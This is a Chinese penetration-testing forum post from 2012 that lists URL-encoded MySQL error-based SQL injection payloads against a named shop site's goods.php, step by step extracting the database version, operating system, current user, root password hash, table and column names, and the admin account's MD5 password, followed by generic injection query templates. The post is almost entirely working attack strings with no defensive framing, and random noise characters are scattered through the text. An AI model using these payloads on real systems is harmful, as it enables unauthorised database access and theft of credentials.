找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
返回列表 发新帖
查看: 2430|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 " d4 J" L! j9 ?
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! a5 J5 L0 D% S. i7 w

. z; H! F+ D% k6 S7 T判断系统
5 }8 n: H' u4 I/ }3 h- S  j' B1 @2 H/ Z. D
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# h! i1 k( S' R2 F% k2 e

* K' [. }! L# L, v" |; R
# H: I' v' n+ a3 F. \3 U1 K
+ J; H" Q! R5 g+ t- ]* b当前 user()
( s8 m- Q7 W! C; T1 m- I7 m
* s2 p8 A) r2 U, }! Nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 x* z( h5 W# \2 s* c

$ g5 D: P5 f& e; L. W) h/ u+ U$ W- v; A

* G$ F  C  F5 r- ^3 G0 u  i当前 database()
, s1 T4 a; A, R; M+ v, {" ]http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. }6 y  g1 o/ C) ^5 {0 W# w$ |: g: j' h. `2 z
- R+ \0 U( h$ n8 a

  X! b  Q9 ~2 c2 Z, c, `0 U2 J- m' X1 d
root hash
3 |: k* H! Y) k  r5 R6 X& f" _
2 d/ [3 ]9 W5 X" _# k3 ~* Jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 @7 N& W; _" u6 B
$ N# u5 D( s9 u4 z
& s# @* D& X: j# Y
. _: g( h. Q5 h- t$ T, D* _/ [当前 数据库表名9 K) N3 r7 A2 {% X+ ]
" M) ?! p: v( T- \# b- Q$ J
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23  m& {& s1 ^! ?! y( G! d. n9 `

* \* ^  V' d  T0 c$ O3 w% m: m5 B7 `# }. X2 R
8 y$ }2 r/ N! T+ n; d( i3 F
当前 数据库 user_name 字段% X5 Y# G2 w) d+ c! v, w1 j; y8 p
& h& Q6 k& n6 g+ C$ w
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 X) e! m9 I, X0 z8 e+ y7 q
1 h$ g5 R7 d) D4 q# {+ X当前 数据库 字段 password1 ^3 t8 u) m# U$ @2 b3 B
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 n- Y7 i; C5 X) L" H3 x7 O) ?
; P& ]& j3 b! ]. E
6 M/ Z/ Y, t7 b

9 h6 o  V# t+ k  I( o获得 admin passwd(md5)
4 \9 Y$ M8 n2 z4 W% z8 ?' H5 F
; e# o, D3 P% j9 y* L+ j2 r0 {& _/ \
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
  f1 H2 @7 L' R9 c4 `" t. ]$ T1 l+ O# k7 B6 q1 `
报错注射
! v+ b% Z2 c: {0 s1 v& {  DSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
1 ~! k$ V4 K1 `" I5 E( y$ r# B' a/ i9 M6 Y: |" M
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
3 O- L8 Z) n8 p$ P( n2 h
9 Z$ i+ C! s# B! O8 X' jand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表